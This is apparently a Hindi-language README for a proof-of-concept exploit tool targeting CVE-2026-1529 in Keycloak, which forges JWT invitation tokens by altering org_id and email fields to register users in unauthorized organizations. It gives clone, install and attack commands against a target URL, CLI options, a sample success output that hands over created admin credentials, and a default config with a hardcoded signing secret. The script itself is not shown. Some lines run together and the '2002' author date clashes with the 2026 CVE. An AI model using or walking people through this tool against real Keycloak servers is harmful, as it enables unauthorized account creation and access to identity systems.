
CVE-2026-1529 (PoC) Keycloak में एक गंभीर भेद्यता है जो अनुचित आमंत्रण टोकन सत्यापन के माध्यम से अनधिकृत संगठन पंजीकरण की अनुमति देती है। यह शोषण उपकरण JWT टोकन में हेरफेर करके उपयोगकर्ताओं को अनधिकृत संगठनों में पंजीकृत करने की भेद्यता को प्रदर्शित करता है।
Keycloak: अनुचित आमंत्रण टोकन सत्यापन के माध्यम से अनधिकृत संगठन पंजीकरण
यह टूल केवल शैक्षिक और सुरक्षा परीक्षण उद्देश्यों के लिए है। केवल उन्हीं सिस्टम पर उपयोग करें जिन्हें परीक्षण करने की आपके पास स्पष्ट अनुमति है। कंप्यूटर सिस्टम तक अनधिकृत पहुंच अवैध और अनैतिक है। इस टूल के लेखक इस सॉफ़्टवेयर के किसी भी दुरुपयोग या क्षति के लिए ज़िम्मेदार नहीं हैं।
निर्माता: f3ds cr3w est, 2002
CVE-2026-1529 Keycloak में एक गंभीर भेद्यता है जो अनुचित आमंत्रण टोकन सत्यापन के माध्यम से अनधिकृत संगठन पंजीकरण की अनुमति देती है। यह एक्सप्लॉइट टूल अनधिकृत संगठनों में उपयोगकर्ताओं को पंजीकृत करने के लिए JWT टोकन में हेरफेर करके भेद्यता को प्रदर्शित करता है।
यह भेद्यता संगठन आमंत्रणों के लिए JWT टोकन सत्यापन प्रक्रिया में मौजूद है। हमलावर JWT पेलोड में org_id और email फ़ील्ड में हेरफेर कर सकते हैं, जिससे वे उचित प्राधिकरण के बिना किसी भी संगठन में उपयोगकर्ताओं को पंजीकृत कर सकते हैं।
git clone https://github.com/ninjazan420/CVE-2026-1529-PoC-keycloak-unauthorized-registration-via-improper-invitation-token-validation
cd CVE-2026-1529-POC
pip install -r requirements.txt
chmod +x keycloak-exploit.py
# लक्ष्य URL के साथ मानक उपयोग
python keycloak-exploit.py https://target-keycloak.com
# सहायता दिखाएं
python keycloak-exploit.py -h
# संस्करण दिखाएं
python keycloak-exploit.py -v
# कस्टम आमंत्रण टोकन का उपयोग करें
python keycloak-exploit.py -t eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9 https://target-keycloak.com
# कस्टम संगठन आईडी का उपयोग करें
python keycloak-exploit.py -o custom_org_id https://target-keycloak.com
# कस्टम कॉन्फ़िगरेशन फ़ाइल का उपयोग करें
python keycloak-exploit.py -c custom_config.json https://target-keycloak.com
# डीबग लॉगिंग सक्षम करें
python keycloak-exploit.py -d https://target-keycloak.com
जब एक्सप्लॉइट सफल होता है, तो आपको ऐसा आउटपुट दिखाई देगा:
=============================================================
CVE-2026-1529 EXPLOIT RESULTS
=============================================================
✓ Target is vulnerable to CVE-2026-1529
🎯 EXPLOIT SUCCESSFUL!
Username: admin_user_2026
Password: KeycloakCVE2026!
Email: [email protected]
Login Link: https://target-keycloak.com/realms/master/account
📄 Report saved to: output/reports/exploit_report_20260210_134556.txt
🔐 Use the provided credentials to access the Keycloak instance!
⚠️ This demonstrates unauthorized access due to CVE-2026-1529
=============================================================
by f3ds cr3w est, 2002
=============================================================
यदि एक्सप्लॉइट विफल हो जाता है, तो आपको दिखाई देगा:
=============================================================
CVE-2026-1529 EXPLOIT RESULTS
=============================================================
✗ Target is not vulnerable
❌ EXPLOIT FAILED!
Check logs for details: logs/exploit.log
CVE-2026-1529-POC/
├── keycloak-exploit.py # Main exploit script
├── requirements.txt # Python dependencies
├── README.md # This file
├── config/
│ └── default_config.json # Default configuration
├── utils/
│ ├── jwt_utils.py # JWT manipulation utilities
│ ├── http_utils.py # HTTP client utilities
│ └── crypto_utils.py # Cryptographic utilities
├── output/
│ ├── logs/ # Log files
│ └── reports/ # Exploit reports
टूल निम्नलिखित सेटिंग्स के साथ एक डिफ़ॉल्ट कॉन्फ़िगरेशन फ़ाइल (config/default_config.json) का उपयोग करता है:
{
"exploit": {
"default_username": "admin_user_2026",
"default_password": "KeycloakCVE2026!",
"default_email": "[email protected]",
"timeout": 30,
"max_retries": 3
},
"jwt": {
"algorithm": "HS256",
"secret_key": "keycloak-cve-2026-1529-exploit",
"token_expiry": 3600
},
"target": {
"endpoints": {
"realms": "/realms",
"organizations": "/organizations",
"register": "/register",
"login": "/login"
}
},
"output": {
"log_level": "INFO",
"save_reports": true,
"report_format": "txt"
}
}
आप एक कस्टम कॉन्फ़िगरेशन फ़ाइल बना सकते हैं और इसे -c विकल्प के साथ उपयोग कर सकते हैं:
{
"exploit": {
"default_username": "custom_user",
"default_password": "CustomPassword123!",
"default_email": "[email protected]",
"timeout": 60,
"max_retries": 5
},
"jwt": {
"algorithm": "HS256",
"secret_key": "custom-secret-key",
"token_expiry": 7200
}
}
टूल निम्नलिखित तरीके से अनुचित JWT सत्यापन का शोषण करता है:
org_id फ़ील्ड को संशोधित करनाemail फ़ील्ड को संशोधित करनाकनेक्शन त्रुटियां
टोकन सत्यापन त्रुटियां
org_id, email, invitation_type) शामिल हैं या नहींपंजीकरण विफलताएं
विस्तृत समस्या निवारण के लिए डीबग लॉगिंग सक्षम करें:
python keycloak-exploit.py -d https://target-keycloak.com
logs/exploit.logoutput/reports/exploit_report_YYYYMMDD_HHMMSS.txtटूल निम्नलिखित जांच करता है:
एक्सप्लॉइट को सफल माना जाता है यदि:
यह टूल केवल शैक्षिक और सुरक्षा परीक्षण उद्देश्यों के लिए प्रदान किया गया है। अपने जोखिम पर उपयोग करें।
निर्माता: f3ds cr3w est, 2002
संपर्क: प्रश्नों या प्रतिक्रिया के लिए, कृपया प्रोजेक्ट रिपॉजिटरी देखें।
याद रखें: महान शक्ति के साथ महान जिम्मेदारी आती है। इस टूल का उपयोग समझदारी और नैतिक रूप से करें।
by f3ds cr3w est, 2002
| विकल्प | विवरण | आवश्यक |
|---|
target | लक्ष्य Keycloak URL (IP या डोमेन) | हाँ |
-t, --token | उपयोग करने के लिए कस्टम आमंत्रण टोकन | नहीं |
-o, --org-id | कस्टम संगठन आईडी | नहीं |
-c, --config | कॉन्फ़िगरेशन फ़ाइल का पथ | नहीं |
-d, --debug | डीबग लॉगिंग सक्षम करें | नहीं |
-v, --version | संस्करण जानकारी दिखाएं | नहीं |
-h, --help | सहायता संदेश दिखाएं | नहीं |